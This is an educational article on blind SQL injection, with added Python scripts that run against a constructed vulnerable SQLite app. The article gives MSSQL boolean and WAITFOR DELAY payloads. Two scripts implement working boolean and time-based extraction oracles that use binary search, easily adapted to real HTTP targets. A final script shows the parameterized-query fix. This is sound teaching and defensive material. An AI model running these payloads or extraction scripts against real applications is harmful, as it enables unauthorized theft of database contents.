What is Blind SQL Injection

Blind SQL Injection is a type of attack in which the attacker does not see the results of the injected query (or any database error messages) in the application's response. Instead, they reconstruct the database's structure and contents step by step from observable side effects of the injection: differences in the content of the response, or in the time the server takes to produce it.

There are two types of blind SQL injections: boolean-based and time-based.

Effects of Blind SQL Injection

Performing an attack using blind SQL injections takes much longer than a regular one, because every piece of information has to be extracted through a separate request, but it can produce the same results. Based on the behavior of the database server and application, an attacker can do the following:

  • Check if other types of SQL injections are possible to execute
  • Learn the structure of the database
  • Obtain information from the database

What Is Boolean-Based Blind SQL Injection?

Boolean-based SQL Injection is a subtype of blind SQL Injection where an attacker observes the behavior of the database server and application after combining legitimate queries with malicious data using boolean operators.

Note: The information provided is in no way intended to encourage illegal actions, it is educational material for security professionals to understand the potential risks and specifics of such attacks.

Example of Boolean Blind SQL Injection

As an example, the following query is intended to display product details from a database:

SELECT * FROM products WHERE id = product_id

First, the attacker uses the application in a legitimate way to detect at least one existing product ID — in this example, product 42. Then, they can provide the following two values for product_id:

42 AND 1=1
42 AND 1=0

If the application builds the query by simple string concatenation, the two queries become:

SELECT * FROM products WHERE id = 42 AND 1=1
SELECT * FROM products WHERE id = 42 AND 1=0

If the application responds differently in the two cases (for example, the product page for the first and an empty page or an error for the second), it is vulnerable to boolean-based blind SQL injection. The first response should also match the response for the legitimate value 42; that response is the baseline against which every later true/false answer is compared.

If the database server is Microsoft SQL Server, the attacker can now provide the following value for product_id:

42 AND (SELECT TOP 1 substring(name, 1, 1)
  FROM sysobjects
  WHERE id=(SELECT TOP 1 id
    FROM (SELECT TOP 1 id
      FROM sysobjects
      ORDER BY id)
    AS subq
    ORDER BY id DESC)) = 'a'

The subquery in parentheses after 42 AND selects the object with the lowest id in sysobjects (the nested TOP 1 ... ORDER BY id / ORDER BY id DESC pattern returns the n-th object when the inner TOP is n; here n = 1) and checks whether its name starts with the letter “a”. If the condition is true, the application behaves as it did for the payload 42 AND 1=1; if it is false, as for 42 AND 1=0. Two details matter in practice: sysobjects lists every object in the database (tables, views, procedures and so on), so an attacker interested only in user tables adds xtype = 'U' to the inner query; and with SQL Server's default case-insensitive collation the comparison with 'a' also matches names starting with 'A'.

The attacker can go through all the letters, then move to the second letter, the third letter, and so on, and thus learn the full name of the first table in the database structure. Comparing the character code with > or < instead of testing each letter for equality turns this into a binary search, which needs about seven requests per character. They can then try to get more information about the structure of this table and finally extract data from it. Although this example is specific to MS SQL, similar techniques exist for other types of databases.
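Below is an added example, not part of the original article, of the whole boolean-based procedure as a practitioner would script it. It assumes a constructed, deliberately vulnerable lookup function backed by an in-memory SQLite database so that it runs offline: SQLite's sqlite_master plays the role of sysobjects, and unicode()/substr() play the role of SQL Server's ASCII()/SUBSTRING(). It goes one step beyond the letter-by-letter approach described above: each character is recovered by binary search over its character code, which costs seven requests per character instead of one request per candidate letter. All function and table names are the example's own.

```python
import sqlite3

# --- Constructed, deliberately vulnerable application ---------------------
# In-memory SQLite stands in for SQL Server: sqlite_master plays the role of
# sysobjects, unicode()/substr() play the role of ASCII()/SUBSTRING().
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (41, 'anvil'), (42, 'rocket skates'), (43, 'bird seed');
""")

def product_page(product_id: str) -> str:
    """Renders the product page. Vulnerable on purpose: product_id is
    concatenated into the statement exactly as described in the article."""
    query = "SELECT name FROM products WHERE id = " + product_id  # injection point
    row = _conn.execute(query).fetchone()
    return f"Product: {row[0]}" if row else "Product not found"

# --- Attacker side ----------------------------------------------------------
KNOWN_PAGE = product_page("42")  # legitimate request, observed first (the baseline)

def boolean_oracle(condition: str) -> bool:
    """True iff the injected SQL condition holds: '42 AND (<cond>)' renders
    the known product page exactly when <cond> is true."""
    return product_page(f"42 AND ({condition})") == KNOWN_PAGE

def confirm_vulnerable(oracle) -> bool:
    """The 1=1 / 1=0 probe: vulnerable if the two responses differ."""
    return oracle("1=1") and not oracle("1=0")

def extract_string(oracle, expr: str, max_len: int = 64) -> str:
    """Recovers the value of the SQL expression `expr` character by character.
    Each character is found by binary search over its character code (printable
    ASCII assumed), so it costs 7 oracle calls instead of one per candidate letter."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break                              # end of the string
        lo, hi = 32, 126                       # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # SQL Server equivalent: ASCII(SUBSTRING(expr, pos, 1)) > mid
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

# Name of the first user table; type='table' corresponds to xtype='U' in sysobjects.
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"

if __name__ == "__main__":
    print("vulnerable:", confirm_vulnerable(boolean_oracle))
    print("first table:", extract_string(boolean_oracle, FIRST_TABLE))
    print("row 43:", extract_string(boolean_oracle, "(SELECT name FROM products WHERE id = 43)"))
```

The oracle is the only part that depends on the target: against a real application it would send an HTTP request and compare the body (or status code, or length) with the baseline page, and everything above it would stay the same.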

What is Time-Based Blind SQL Injection?

Time-based SQL injection is a subtype of blind SQL injection, where an attacker observes the behavior of the database server and application after combining legitimate queries with SQL commands that cause time delays.

Example of a Time-Based Blind SQL injection

The same query can be taken as in the example above:

SELECT * FROM products WHERE id = product_id

The attacker could provide the following value for product_id:

42; WAITFOR DELAY '0:0:10'

The resulting query becomes:

SELECT * FROM products WHERE id = 42; WAITFOR DELAY '0:0:10'

If the database server is Microsoft SQL Server and the application is vulnerable to time-based blind SQL injection, the response arrives about 10 seconds later than usual. Two caveats apply. The payload relies on stacked queries (a second statement after the semicolon), which SQL Server supports but many other database and driver combinations do not; where they are unavailable, the delay is placed inside the WHERE clause using the engine's delay function (for example SLEEP() in MySQL or pg_sleep() in PostgreSQL). And since response times also vary with server load and network conditions, a single slow response is weak evidence: repeating the request a few times and comparing against baseline timings avoids false positives.

Now that the attacker knows that time-based blind SQL injections are possible, they can provide the following value for product_id:

42; IF(EXISTS(SELECT TOP 1 *
  FROM sysobjects
  WHERE id=(SELECT TOP 1 id
    FROM (SELECT TOP 1 id
      FROM sysobjects
      ORDER BY id)
    AS subq
    ORDER BY id DESC)
  AND ascii(lower(substring(name, 1, 1))) = 97))
  WAITFOR DELAY '0:0:10'

If the name of the first table in the database structure starts with the letter “a” (ASCII code 97; lower() makes the check case-insensitive regardless of collation), the EXISTS condition is true and the application responds with a 10-second delay. Otherwise it responds immediately. Since ascii() returns a number, the comparison is with 97 rather than with the string 'a'.

As with the boolean-based blind SQL injections described above, the attacker can repeat this method to learn the name of the first table in the database structure, then learn more about it and extract data from the table.
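An added example, not from the original article, of a time-based oracle with the measurement caveat handled: the request is repeated and the median response time is compared with the injected delay, so one slow response cannot be mistaken for a true condition. It uses a constructed vulnerable lookup over in-memory SQLite; since SQLite has no WAITFOR DELAY, a user-defined sleep() SQL function is registered to stand in for it, and the delay is placed inside the WHERE clause because the sqlite3 driver, like many others, rejects stacked queries. The delay is shortened from 10 s to 0.2 s so the demonstration runs quickly; the function and table names are the example's own.

```python
import sqlite3
import statistics
import time

# --- Constructed, deliberately vulnerable application ---------------------
# In-memory SQLite stands in for SQL Server. SQLite has no WAITFOR DELAY, so a
# sleep() SQL function is registered to play that role (returns 1 after sleeping).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (41, 'anvil'), (42, 'rocket skates');
""")
_conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 1)

def product_page(product_id: str) -> str:
    """Vulnerable on purpose: product_id is concatenated into the query."""
    row = _conn.execute("SELECT name FROM products WHERE id = " + product_id).fetchone()
    return f"Product: {row[0]}" if row else "Product not found"

# --- Attacker side ----------------------------------------------------------
DELAY = 0.2   # seconds; the article uses 10 s, shortened so the demo runs quickly

def timed_request(product_id: str) -> float:
    """Sends one request and returns its response time in seconds."""
    start = time.perf_counter()
    product_page(product_id)
    return time.perf_counter() - start

def time_oracle(condition: str, samples: int = 3) -> bool:
    """True iff `condition` holds, judged purely by response time. The request
    is repeated and the median compared with half the injected delay, so a
    single slow response (load, network jitter) cannot produce a false positive."""
    # Delay inside the WHERE clause: the sqlite3 driver, like many others,
    # rejects stacked queries ('42; ...'). SQL Server form: IF (cond) WAITFOR DELAY '0:0:10'.
    payload = f"42 AND CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END"
    timings = [timed_request(payload) for _ in range(samples)]
    return statistics.median(timings) >= DELAY / 2

def confirm_vulnerable() -> bool:
    """Delayed response for a true condition, prompt response for a false one."""
    return time_oracle("1=1") and not time_oracle("1=0")

def first_table_starts_with(letter: str) -> bool:
    """The article's check, ported: does the first user table's name start with
    `letter`? sqlite_master with type='table' corresponds to sysobjects with xtype='U'."""
    assert len(letter) == 1 and letter.isalnum()   # keep the probe a single character
    first_table = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"
    return time_oracle(f"lower(substr({first_table}, 1, 1)) = '{letter}'")

if __name__ == "__main__":
    print("vulnerable:", confirm_vulnerable())
    print("starts with 'a':", first_table_starts_with("a"))
    print("starts with 'p':", first_table_starts_with("p"))
```

Against a real target the threshold should be derived from measured baseline timings rather than a fixed fraction of the delay, and the number of samples raised when the network is noisy; the oracle function is the only part that changes.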

An article about cache bypass techniques for time-based SQL injection can be read here.

How to Prevent Blind SQL Injection Vulnerabilities?

The only completely effective way to prevent all types of SQLi vulnerabilities in a web application, including blind ones, is to use parameterized queries (prepared statements) to access SQL databases: the statement is compiled with placeholders, and user-supplied values are bound as data afterwards, so they are never parsed as SQL.

If the language or driver does not support parameterized queries but the database engine supports stored procedures, teams can call stored procedures instead, with one condition: a procedure that assembles SQL from its arguments by string concatenation (dynamic SQL via EXEC or sp_executesql on SQL Server) is just as injectable as the application code it replaced.

Relying solely on other prevention methods, such as whitelists, blacklists, or input filtering/escaping, is not recommended, because attackers regularly find ways around them. They are still worthwhile as defence in depth, for example rejecting a product_id that is not an integer before it ever reaches the database.
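An added example, not the article's own code, showing the same product lookup written with string concatenation and with a bound parameter, again over in-memory SQLite. The probe payloads from the boolean example serve as the check: the concatenated version answers 42 AND 1=1 and 42 AND 1=0 differently, the parameterized version does not, and an integer check in front of the query rejects both payloads before they reach the database. Function and table names are the example's own.

```python
import sqlite3

# Constructed in-memory database standing in for the product catalogue.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (42, 'rocket skates');
""")

def lookup_concatenated(product_id: str):
    """Vulnerable: the value becomes part of the SQL text and is parsed as SQL."""
    return _conn.execute("SELECT name FROM products WHERE id = " + product_id).fetchone()

def lookup_parameterized(product_id):
    """Fixed: the value is bound to a placeholder. The statement is compiled
    first and the value is only ever treated as data, never as SQL, so
    '42 AND 1=1' is simply a string that equals no product id."""
    return _conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()

def lookup_typed(product_id: str):
    """Defence in depth on top of the parameterized query: a product id must be
    an integer, so anything else is rejected before it reaches the database."""
    return lookup_parameterized(int(product_id))  # ValueError for '42 AND 1=1'

PROBE_TRUE, PROBE_FALSE = "42 AND 1=1", "42 AND 1=0"

def has_boolean_oracle(lookup) -> bool:
    """The article's detection check: does the lookup answer the two probes differently?"""
    return lookup(PROBE_TRUE) != lookup(PROBE_FALSE)

if __name__ == "__main__":
    print("concatenated:", has_boolean_oracle(lookup_concatenated))    # True
    print("parameterized:", has_boolean_oracle(lookup_parameterized))  # False
```

The time-based payload is neutralized the same way: bound as a parameter, "42; WAITFOR DELAY '0:0:10'" is a string that matches nothing, and no second statement is ever executed.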

Blind SQL Injection Detection

The only way to check whether a site is vulnerable to SQL injection is to test it. In practice that means sending the probes described above, a true/false pair and a delay payload, to every parameter and comparing the responses against a baseline.

In particular, you can use a DAST (black-box testing) solution, which automates these probes and allows teams to find the vulnerability in time for quick remediation.
